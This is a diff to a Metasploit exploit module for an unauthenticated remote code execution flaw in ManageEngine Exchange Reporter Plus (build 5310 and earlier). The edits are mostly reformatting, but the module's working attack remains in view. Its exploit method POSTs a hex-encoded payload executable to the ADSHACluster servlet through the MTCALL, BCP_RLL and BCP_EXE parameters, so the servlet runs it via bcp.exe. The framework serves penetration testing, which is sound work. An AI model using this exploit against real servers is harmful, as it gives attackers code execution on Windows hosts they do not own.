@@ -3,51 +3,58 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-class MetasploitModule  < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::EXE
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'ManageEngine Exchange Reporter Plus Unauthenticated RCE',
-      'Description'    => %q{
-        This module exploits a remote code execution vulnerability that
-        exists in Exchange Reporter Plus <= 5310, caused by execution of
-        bcp.exe file inside ADSHACluster servlet
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'ManageEngine Exchange Reporter Plus Unauthenticated RCE',
+        'Description' => %q{
+          This module exploits a remote code execution vulnerability that
+          exists in Exchange Reporter Plus <= 5310, caused by execution of
+          bcp.exe file inside ADSHACluster servlet
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Kacper Szurek <kacperszurek@gmail.com>'
         ],
-      'References'     =>
-        [
+        'References' => [
           ['URL', 'https://security.szurek.pl/en/manage-engine-exchange-reporter-plus-unauthenticated-rce/']
         ],
-      'Platform'       => ['win'],
-      'Arch'           => [ARCH_X86, ARCH_X64],
-      'Targets'        => [['Automatic', {}]],
-      'DisclosureDate' => '2018-06-28',
-      'DefaultTarget'  => 0))
+        'Platform' => ['win'],
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Targets' => [['Automatic', {}]],
+        'DisclosureDate' => '2018-06-28',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options(
       [
         OptString.new('TARGETURI', [ true, 'The URI of the application', '/']),
         Opt::RPORT(8181),
-      ])
-
+      ]
+    )
   end
 
   def bin_to_hex(s)
-      s.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join
+    s.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
   end
 
   def check
     res = send_request_cgi({
       'method' => 'POST',
-      'uri'    => normalize_uri(target_uri.path, 'exchange', 'servlet', 'GetProductVersion')
+      'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'GetProductVersion')
     })
 
     unless res
@@ -79,10 +86,10 @@ class MetasploitModule  < Msf::Exploit::Remote
 
   def exploit
     res = send_request_cgi({
-      'method'    => 'POST',
-      'uri'       => normalize_uri(target_uri.path, 'exchange', 'servlet', 'ADSHACluster'),
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'exchange', 'servlet', 'ADSHACluster'),
       'vars_post' => {
-        'MTCALL'  => "nativeClient",
+        'MTCALL' => "nativeClient",
         'BCP_RLL' => "0102",
         'BCP_EXE' => bin_to_hex(generate_payload_exe)
       }
